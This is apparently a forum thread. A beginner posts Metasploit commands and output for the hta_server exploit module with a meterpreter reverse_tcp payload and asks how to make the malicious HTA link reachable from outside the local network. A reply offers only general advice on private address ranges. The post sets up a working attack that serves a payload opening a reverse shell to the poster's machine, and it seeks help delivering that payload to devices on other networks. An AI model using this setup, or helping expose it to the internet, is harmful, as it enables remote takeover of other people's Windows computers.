Cannot access hta server with url outside LAN with metasploit, reverse_tcp

I am creating an HTA server for windows.

msf6 > set SRVHOST (my local ip)
SRVHOST => (my local ip)
msf6 > set LHOST (my local ip)
LHOST => (my local ip)
msf6 > set LPORT 12357
LPORT => 12357
msf6 > use exploit/windows/misc/hta_server
[] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > exploit
[
] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[] Started reverse TCP handler on (my local ip):12357
msf6 exploit(windows/misc/hta_server) > [
] Using URL: http://(my local ip):8080/2cvlsLmmrNEhu.hta
[*] Server started.

But when I use my phone, connected to another network, trying to access the URL does not work. I have searched for it but nobody has a similar question. I am a beginner that doesn’t know much, can anybody help me? I have tried replacing the local IP with my public IP, and it shows [-] Handler failed to bind to (my public IP):12357:- - What should I do? I have already forwarded port 8080 in my router preferences.

@tennessine said:

But when I use my phone, connected to another network, trying to access the URL does not work. I have searched for it but nobody has a similar question. I am a beginner that doesn’t know much, can anybody help me? I have tried replacing the local IP with my public IP, and it shows [-] Handler failed to bind to (my public IP):12357:- - What should I do? I have already forwarded port 8080 in my router preferences.

So I dont really know the answer here as I’ve never tried this myself.

However, some networking fundamentals matter.

If your server is running on an IP address listed in RFC1918 as a “local internets” address, then you cant access it from another network without some configuration changes to your networking set up.